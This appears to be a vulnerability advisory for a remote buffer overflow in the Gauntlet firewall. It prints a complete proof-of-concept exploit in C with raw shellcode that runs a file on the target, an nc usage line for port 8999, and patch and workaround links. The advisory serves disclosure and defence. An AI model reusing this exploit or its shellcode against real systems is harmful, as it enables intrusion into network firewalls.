|
Vulnerability Gauntlet Affected Gauntlet Description This was posted to the Guantlet User list. The claim is that there is no exploit "in the wild" and that the only holders of the code are NAI and Garrison Tech, and they don't plan to release it which is not truth (see below). Of course, nobody else will figure it out, right? Nice to have a buffer overflow in a firewall in any case. Below is proof of concept code. Since this exploit exists, it gives us new fear that there is probably more to come. Security verdors need to pay better attention to the code they put out. Pix, Checkpoint, Gauntlet, all have exploits that came out this year. So here it is, script kiddies don't bother, this code wont help you. It is written to run a test file called /bin/zz Just throw a file called zz in /bin on the gauntlet firewall and chmod it to 700. Inside the zz file you should have it do something where it will leave you a log. Here is a real simple example. #!/bin/sh echo "IT RAN" > /tmp/TEST And here comes exploit: /* * Animal.c * * * Remote Gauntlet BSDI proof of concept exploit. * Garrison technologies may have found it, but I am the * one who released it. ;) I do not have a Sparc or I would * write up the Solaris one too. If you have one, please * make the changes needed and post it. Thanks. * * Script kiddies can go away, this will only execute a file * named /bin/zz on the remote firewall. To test this code, * make a file named /bin/zz and chmod it to 700. * I suggest for the test you just have the zz file make a note * in syslog or whatever makes you happy. * * This code is intened for proof of concept only. * * * _Gramble_ * Hey BuBBles * *To use: * # Animal | nc <address> 8999 */ #include <stdio.h> char data[364]; main() { int i; char shelloutput[80]; /* just borrowed this execute code from another exploit */ unsigned char shell[] = "\x90" "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00"; for(i=0;i<264;i++) data[i]=0x90; data[i]=0x30;i++; data[i]=0x9b;i++; data[i]=0xbf;i++; data[i]=0xef;i++; data[i] = 0x00; for (i=0; i<strlen(shell); i++) shelloutput[i] = shell[i]; shelloutput[i] = 0x00; printf("10003.http://%s%s", data, shelloutput); } Solution Patches are available from http://www.tis.com/support/patchpage.html the patch you need is cyber.patch for whatever version you are currently running. There is no released patch for Gauntlet 4.1, however if you refer to the advisory you can implement the workaround detailed in that advisory. Network Associates released a patch to address this issue. See: http://www.pgp.com/jump/gauntlet_advisory.asp for further information.